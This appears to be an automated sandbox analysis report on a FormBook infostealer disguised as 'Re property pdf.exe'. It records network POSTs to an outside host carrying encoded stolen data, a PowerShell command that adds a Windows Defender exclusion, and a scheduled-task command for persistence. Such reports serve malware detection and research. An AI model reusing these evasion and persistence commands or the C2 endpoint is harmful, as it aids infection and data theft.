                                                                                                                            x-hcdn-request-id: 7f7c8e2ab29aa6ddd920d017a44674e4-phx-edge5
                                                                                                                            Expires: Sat, 19 Oct 2024 10:59:57 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                            Oct 19, 2024 12:59:58.617074013 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                            Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                            Oct 19, 2024 12:59:58.617085934 CEST424INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                            Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                            Oct 19, 2024 12:59:58.617948055 CEST1236INData Raw: 70 78 20 30 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 62 61 73 65 6c 69 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67
                                                                                                                            Data Ascii: px 0;align-items:baseline;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.secti
                                                                                                                            Oct 19, 2024 12:59:58.618014097 CEST212INData Raw: 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69
                                                                                                                            Data Ascii: container{margin-top:30px}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmana
                                                                                                                            Oct 19, 2024 12:59:58.618024111 CEST1236INData Raw: 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 32 36 35 37 35 39 38 39 2d 34 34 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65
                                                                                                                            Data Ascii: ger.com/gtag/js?id=UA-26575989-44" async></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class
                                                                                                                            Oct 19, 2024 12:59:58.618032932 CEST212INData Raw: 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 69 67 6e 2d 69 6e 2d 61 6c 74 22 3e 3c 2f 69 3e 20 4c 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                                                                            Data Ascii: ue class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div
                                                                                                                            Oct 19, 2024 12:59:58.618041992 CEST1236INData Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69
                                                                                                                            Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
                                                                                                                            Oct 19, 2024 12:59:58.618053913 CEST1236INData Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76
                                                                                                                            Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
                                                                                                                            Oct 19, 2024 12:59:58.618067026 CEST424INData Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b
                                                                                                                            Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
                                                                                                                            Oct 19, 2024 12:59:58.623495102 CEST1236INData Raw: 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 31 29 22 29 3b 69 66 28 66 2b 3d 73 2a 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36
                                                                                                                            Data Ascii: floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("p


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            49192.168.2.4500563.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 13:00:03.721625090 CEST860OUTPOST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 6a 64 70 51 47 53 56 6c 35 76 37 73 4b 37 35 38 4f 58 64 6f 30 75 36 75 6b 6a 50 46 4b 37 42 6e 44 48 35 42 51 70 30 6f 42 69 30 64 62 64 36 73 4a 77 2f 4b 35 4e 6e 75 72 61 52 30 66 4b 42 76 63 31 6d 63 6c 79 71 4b 64 7a 77 49 7a 4e 6d 6d 2b 72 6c 47 63 67 41 4a 57 37 35 2b 35 38 5a 6f 4b 77 64 79 64 73 63 6c 46 4e 41 38 41 4f 32 73 44 79 64 73 63 56 4d 2b 68 34 7a 68 73 4e 53 75 5a 47 66 38 78 32 32 46 32 57 62 6e 62 4b 53 4b 4b 52 63 36 76 4b 58 4a 72 49 46 72 41 62 4d 79 5a 59 52 77 6e 78 71 72 78 71 2b 74 64 35 68 31 6d 42 6e 4b 62 6f 56 30 51 4a 73 4d 65 4a 35 6d 32 77 3d 3d
                                                                                                                            Data Ascii: 2BWDG=jdpQGSVl5v7sK758OXdo0u6ukjPFK7BnDH5BQp0oBi0dbd6sJw/K5NnuraR0fKBvc1mclyqKdzwIzNmm+rlGcgAJW75+58ZoKwdydsclFNA8AO2sDydscVM+h4zhsNSuZGf8x22F2WbnbKSKKRc6vKXJrIFrAbMyZYRwnxqrxq+td5h1mBnKboV0QJsMeJ5m2w==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            50192.168.2.4500573.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 13:00:06.939129114 CEST880OUTPOST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 6a 64 70 51 47 53 56 6c 35 76 37 73 4b 62 4a 38 49 45 46 6f 79 4f 36 74 6f 44 50 46 41 62 41 75 44 41 78 42 51 6f 77 34 42 77 41 64 63 2f 69 73 49 78 2f 4b 36 4e 6e 75 6b 36 52 78 52 71 42 6b 63 31 69 55 6c 77 4f 4b 64 7a 6b 49 7a 50 2b 6d 2b 38 78 46 63 77 41 78 64 62 35 38 33 63 5a 6f 4b 77 64 79 64 76 68 4f 46 4e 59 38 41 37 2b 73 43 51 35 76 57 31 4d 39 6f 59 7a 68 6f 4e 53 71 5a 47 65 5a 78 33 71 76 32 55 6a 6e 62 4b 43 4b 4b 41 63 35 6b 4b 58 4c 31 49 45 4c 47 4a 74 64 64 39 78 38 6f 33 2b 4a 75 65 50 4f 59 2f 77 76 33 77 47 64 4a 6f 78 48 4e 4f 6c 34 54 4b 45 76 74 37 4b 57 56 4c 55 2f 51 46 6b 61 4d 78 68 4e 62 42 4d 36 6f 4c 55 3d
                                                                                                                            Data Ascii: 2BWDG=jdpQGSVl5v7sKbJ8IEFoyO6toDPFAbAuDAxBQow4BwAdc/isIx/K6Nnuk6RxRqBkc1iUlwOKdzkIzP+m+8xFcwAxdb583cZoKwdydvhOFNY8A7+sCQ5vW1M9oYzhoNSqZGeZx3qv2UjnbKCKKAc5kKXL1IELGJtdd9x8o3+JuePOY/wv3wGdJoxHNOl4TKEvt7KWVLU/QFkaMxhNbBM6oLU=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            51192.168.2.4500583.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 13:00:09.557213068 CEST10962OUTPOST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 6a 64 70 51 47 53 56 6c 35 76 37 73 4b 62 4a 38 49 45 46 6f 79 4f 36 74 6f 44 50 46 41 62 41 75 44 41 78 42 51 6f 77 34 42 77 34 64 62 4d 71 73 4a 53 58 4b 37 4e 6e 75 36 4b 52 77 52 71 42 6c 63 31 61 51 6c 77 44 39 64 78 63 49 79 71 69 6d 76 34 64 46 53 77 41 78 53 37 35 39 35 38 5a 35 4b 77 73 35 64 76 78 4f 46 4e 59 38 41 36 4f 73 43 43 64 76 5a 56 4d 2b 68 34 7a 58 73 4e 53 53 5a 48 32 76 78 30 48 61 32 6b 44 6e 61 72 79 4b 48 53 45 35 6d 71 58 7a 77 49 45 70 47 4a 68 43 64 35 59 50 6f 33 69 7a 75 5a 2f 4f 56 71 4e 76 74 67 79 2f 4c 71 78 55 5a 38 6c 59 66 5a 30 63 6f 5a 4b 66 52 49 63 58 54 47 6b 2b 4f 7a 41 42 50 68 52 39 72 65 69 6a 7a 5a 61 61 4c 71 62 45 55 65 52 4d 62 45 67 74 55 69 73 77 63 61 42 4f 4b 4a 4f 48 39 57 70 45 39 45 51 48 53 4e 68 48 78 57 54 43 61 73 54 56 69 49 78 33 34 38 6f 6e 4f 31 71 35 33 6c 4a 5a 47 66 68 77 5a 76 49 50 64 75 2f 34 41 42 30 72 39 38 71 58 66 53 6d 53 71 6f 4d 42 2b 67 64 6d 65 74 57 43 47 4a 35 51 65 53 77 57 79 77 38 61 63 38 68 64 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=jdpQGSVl5v7sKbJ8IEFoyO6toDPFAbAuDAxBQow4Bw4dbMqsJSXK7Nnu6KRwRqBlc1aQlwD9dxcIyqimv4dFSwAxS75958Z5Kws5dvxOFNY8A6OsCCdvZVM+h4zXsNSSZH2vx0Ha2kDnaryKHSE5mqXzwIEpGJhCd5YPo3izuZ/OVqNvtgy/LqxUZ8lYfZ0coZKfRIcXTGk+OzABPhR9reijzZaaLqbEUeRMbEgtUiswcaBOKJOH9WpE9EQHSNhHxWTCasTViIx348onO1q53lJZGfhwZvIPdu/4AB0r98qXfSmSqoMB+gdmetWCGJ5QeSwWyw8ac8hdyr4DnLDWMrAaK9FAuNN6XNDDFqMtCnFaD9BaKcK3U7P303i7evs6g4p380P4EDnKlr2RdqCD8dWgIEWg9nLRVLLfIhQd38OVpoJS4nTbseMxQ2jLMbPx5YgN4GrTT1WfJ5rMZmIulXInMnhORWQranWvF/fdda7mQDkGfyZb16GZwjSuOTr3QsStkP6Wy0WxLPksFJzR8L9gpc95eCeiSrNwVkFG29/xdRP0EDSzijMPwUYo9c0noJrzxQ2ac8vRBHRsYI09brSTPKxdX7KPHTSmUePTp5C23hUw6LSSjfZATyV+W13AltNH6ZHoCKY6dGCUNvGQ31RKJuPnr7mCFMsjhvhpL3omxnDj+3gOWW7x7s1/xZKN7Gzwx8BlEiDojM3oPgS9STrWV52ePpKmdkHQ3AjNCmwJW9IOQWDIEpnQNXDpRSs7dOTDMFXR/E9JcVFQICopCFS1JU+ny+qKYqSRYrsVylWxiGw1F9oiO13RWTZ7Z+DHTs0t9gxSFxaBauotT2d7yhmwdyavG3PDwazMbKb8NhmajUD04Bt73soKCZTkn38P+NHOUOzkOHbcuhajTFjbq1oYSGN4Qraq6tHq/5xJFCIHsd/KVPitnBZR0M5tBpmmh/PWuvjK4bFpgdmC7/7y/cNpIgTdBkYylGLxn2MiAdBLYA [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            52192.168.2.4500593.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 13:00:12.732429981 CEST594OUTGET /a57a/?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 13:00:13.328516960 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 11:00:13 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 42 57 44 47 3d 75 66 42 77 46 69 70 72 6f 62 33 56 46 36 6b 36 55 45 31 32 37 39 57 33 30 7a 58 48 41 63 6f 41 4d 51 35 44 41 38 45 6e 63 52 77 53 53 64 57 54 41 67 6a 70 2f 50 54 36 71 62 52 76 4b 5a 68 79 57 77 37 4f 6d 68 44 33 64 67 67 4c 35 39 7a 79 68 36 42 73 4d 57 6f 49 61 73 4a 54 76 64 74 59 50 69 30 74 45 63 74 79 5a 37 55 37 44 37 53 4f 48 44 56 45 4f 6e 6b 3d 26 77 66 6d 3d 47 36 6f 54 6f 38 76 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:06:56:07
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Re property pdf.exe"
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0xa80000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"
                                                                                                                            Imagebase:0x610000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:06:56:10
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Re property pdf.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:06:56:10
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Imagebase:0xa40000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:06:56:11
